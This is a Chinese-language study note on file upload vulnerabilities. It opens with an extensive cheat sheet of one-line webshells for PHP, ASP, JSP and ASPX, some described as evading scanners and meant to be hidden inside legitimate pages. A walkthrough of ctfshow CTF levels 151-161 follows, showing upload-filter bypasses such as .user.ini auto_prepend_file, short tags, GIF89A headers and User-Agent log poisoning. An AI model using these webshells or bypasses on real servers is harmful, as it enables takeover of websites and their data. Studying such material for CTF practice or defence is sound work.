文件上传的学习

文件上传漏洞

文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷，而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马，病毒，恶意脚本或者WebShell等。“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。

webshell

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称之为一种网页后门。攻击者在入侵了一个网站后，通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起，然后使用浏览器来访问这些后门，得到一个命令执行环境，以达到控制网站服务器的目的（可以上传下载或者修改文件，操作数据库，执行任意命令等）。 WebShell后门隐蔽较性高，可以轻松穿越防火墙，访问WebShell时不会留下系统日志，只会在网站的web日志中留下一些数据提交记录

一句话木马总结

php

##PHP：
<?php @eval($_POST['zzc']);?> 
<?php phpinfo();?>
<?php @eval($_POST[zzc]);?>
<?php @eval($_REQUEST[zzc]);?>
<?php assert($_REQUEST[zzc]); ?>
<?php //?cmd=phpinfo() @preg_replace("/abc/e",$_REQUEST['zzc'],"abcd"); ?>
<?php 
//?cmd=phpinfo();
$func =create_function('',$_REQUEST['zzc']);
$func();
?>

<?php
//?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?>

<?php 
//?cmd=phpinfo()
@call_user_func(assert,$_GET['zzc']);
?>

<?php 
//?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>

<?php 
//?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>

<?php usort($_GET,'asse'.'rt');?> php环境>=<5.6才能用
<?php usort(...$_GET);?>  php环境>=5.6才能用
<?php eval($_POST1);?> 
<?php if(isset($_POST['c'])){eval($_POST['c']);}?> 
<?php system($_REQUEST1);?> 
<?php ($_=@$_GET1).@$_($_POST1)?> 
<?php eval_r($_POST1)?> 
<?php @eval_r($_POST1)?>//容错代码 
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句 
<?$_POST['c']($_POST['cc']);?> 
<?$_POST['c']($_POST['cc'],$_POST['cc'])?> 
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O> 
<?php echo `$_GET['r']` ?> 

<script language="php">@eval_r($_POST[sb])</script> //绕过<?限制的一句话

<?php (])?>   上面这句是防杀防扫的！网上很少人用！可以插在网页任何ASP文件的最底部不会出错，比如 index.asp里面也是可以的！

<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system ($_REQUEST[1]);?> 
加了判断的PHP一句话，与上面的ASP一句话相同道理，也是可以插在任何PHP文件 的最底部不会出错！

<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request (“class”)%><%execute request(“class”)'<% loop <%:%> 
无防下载表，有防下载表可尝试插入以下语句突破的一句话 

<%eval(request(“1″)):response.end%> 备份专用

asp

##ASP
<%eval(Request.Item["zzc"],”unsafe”);%>

<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%> 

<%execute(request(“1″))%> 

<scriptrunat=server>execute request(“1″)</script> 不用'<,>‘的asp一句话

jsp

##JSP：
<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%> 
提交客户端 
<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>

aspx

##aspx
<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y (“add6bb58e139be10″);</script> 

<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script> 

<%eval request(chr(35))%>  不用双引号的一句话。

大致漏洞原理如下：

在 WEB 中进行文件上传的原理是通过将表单设为 multipart/form-data，同时加入文件域，而后通过 HTTP 协议将文件内容发送到服务器，服务器端读取这个分段 (multipart) 的数据信息，并将其中的文件内容提取出来并保存的。通常，在进行文件保存的时候，服务器端会读取文件的原始文件名，并从这个原始文件名中得出文件的扩展名，而后随机为文件起一个文件名 ( 为了防止重复 )，并且加上原始文件的扩展名来保存到服务器上

文件上传后导致的常见安全问题一般有:

1.上传文件是Web脚本语言，服务器的Web容器解释并执行了用户上传的脚本,导致代
码执行;

2.上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(其
他通过类似方式控制策略文件的情况类似);

3.上传文件是病毒、木马文件，黑客用以诱骗用户或者管理员下载执行:

4.上传文件是钓鱼图片或为包含了脚本的图片，在某些版本的浏览器中会被作为脚本执
行，被用于钓鱼和欺诈。

除此之外，还有一些不常见的利用方法，比如将上传文件作为一个入口,溢出服务器的后台处理程序，如图片解析模块;或者上传-一个合法的文本文件，其内容包含了PHP脚本，再通过“本地文件包含漏洞(Local File Include)"执行此脚本;等等。

思路

常规类

扫描获取上传，会员中心头像上传，后台系统上传，其他途径上传。

cms类

已知道的cms源码。

编辑类

ckeditor，fckeditor，kindeditor，xxxxeditor。

其他类/CVE

代码审计，平台或第三方应用。

web界面存在的风险点

上传头像、上传身份认证、上传文件以及有存在文件上传的地方就可能存在相关的漏洞，但不是有文件上传就一定有漏洞，但有文件上传就能进行测试。

文件上传实战思路

上传文件和文件执行是两个东西
漏洞分类：解析漏洞、cms漏洞、其他漏洞（编辑器漏洞、cve漏洞、安全修复）
思路：
如果有一个网站，要从文件上传的方向开始
第一步：先看中间件，看是否存在解析漏洞/CMS/编辑器漏洞/CVE/
如果有，如何找：
字典扫描：扫描会员中心，文件上传的位置，找到后，如何利用：验证/绕过

二次渲染：

1. 二次渲染原理：

在我们上传文件后，网站会对图片进行二次处理（格式、尺寸要求等），服务器会把里面的内容进行替换更新，处理完成后，根据我们原有的图片生成一个新的图片并放到网站对应的标签进行显示。

2. 绕过：

1、配合文件包含漏洞：
将一句话木马插入到网站二次处理后的图片中，也就是把一句话插入图片在二次渲染后会保留的那部分数据里，确保不会在二次处理时删除掉。这样二次渲染后的图片中就存在了一句话，在配合文件包含漏洞获取webshell。

2、可以配合条件竞争：
这里二次渲染的逻辑存在漏洞，先将文件上传，之后再判断，符合就保存，不符合删除，可利用条件竞争来进行爆破上传

（知识点补充，【文件上传绕过】——条件竞争漏洞_条件竞争上传漏洞-CSDN博客）

实战部分（以ctfshow为例）

151

这里给的提示是前端校验不可靠，所以说，要从前端的代码入手

这里主要有两种思路：

1：

js防护：

JS防护就是将上传的文件进行一个格式的验证，但是JS类的防护是用户可以控制的，所以前端的所有验证都是不安全的。

所以这里选择，改掉这道题前端对文件类型的检测，例如：将允许上传的文件类型从JPG改成php。

2：

上传图片马，再用bp抓包将文件的后缀名改掉，但是明显有一点不符合题目要求，所以这里第二种不再展示

修改前端的代码以后，就可以成功上传一般的一句话木马了

连接,查看上一级目录发现flag文件

查看flag.php文件

得到flag

152

这里给的提示是后端校验

这里与前一题的思路不一样，前端文件的检测无法修改，所以尝试上传以后，改文件类型，即content type

经过测试，发现png格式类型是可以的，上传以后，改掉文件的后缀，就上传成功获得了路径

连接成功以后，发现根目录没有什么有用的信息

文件位置和上一题的位置是一样的，查看flag.php可以得到flag

153

和前面一题给的提示是一样的，所以这里尝试，改后端的文件类型

直接上传php文件显示文件类型不合规，尝试修改content-type上传不成功，上传php3
后缀服务器不能解析
尝试访问upload文件夹，发现upload文件夹有默认索引，具有index.php文件，那么可以利用.user.ini文件来进行上传

.user.ini文件其实就是一个局部配置文件，可以通过配置选项使每个php文件头或文件尾都进行文件包含

然后就是和上面一样的步骤来获得flag.php文件

154-155

这里是过滤了文件的内容

通过查看源码发现是php这一关键字被过滤

大致步骤与153题一样。在上传的时候发现图片马上传不了，经过测试发现对图片内容中的php做了处理，那么在图片马中可以采用php其他风格得写法，如短标签等。具体可以参考PHP四种标记风格，通过更改，可以让参数成功上传，然后就可以通过传参查看flag.php

156

源码检测了php和[，采用短标记和大括号替代

157

上传.user.ini
在上传图片马得过程中，经过使用二分法对一句话木马的分析发现，后台代码对图片马内容中的关键字‘php’,'[]','{}'以及';'都进行了检测，这一关的性质就由文件上传转变为了任意代码执行，那么只好再次对木马文件进行伪装

php

<?= @eval(array_pop($_POST))?>

使用=短标签绕过php检测
@不提示报错信息
eval()把内容当作php语句执行
array_pop()将数组中最后一个元素取出并删除
使用$_POST接受任意变量
使用该文件并不能获取shell，只能通过POST提交数据进行代码执行

158

过滤多了一个log

159

过滤了括号，那就用反引号

160

日志空格检测

考点：后端内容校验强限制日志文件包含利用

首先要介绍一下php中include函数：

在php代码的进行过程中，遇到include函数就去跳转到包含的文件中进行读取，并显示在输出中，如果是php代码，会自动解析，如果不是，则单纯以文本的方式显示，示例如下：

在上传.user.ini配置文件时，经过测试发现多了对空格的检测。
POC：

bash

auto_prepend_file=1.png			.user.ini内容
<?=include"/var/lo"."g/nginx/access.l"."og"?>		1.png内容

其余操作与上一关一致，通过修改UA头将后门代码写入日志，然后连接后门(就是改ua头)

改完以后，传参得到flag

161

这里检测的是头文件类型，也就是说除了一开始文件类型检测，还要检测，头文件

直接传png文件的话，是检测不过的

.JPEG;.JPE;.JPG，”JPGGraphic File”

.gif，”GIF 89A”

.zip，”Zip Compressed”

.doc;.xls;.xlt;.ppt;.apr，”MS Compound Document v1 or Lotus Approach

这里选择加GIF89A,即动图gif的文件头前缀

可以看到，上传成功，获得了相应的路径

ini文件也是一样的处理方法

和上一题一样访问index.php,修改ua头，在ua头中插入木马内容就可以了

就可以拿到flag了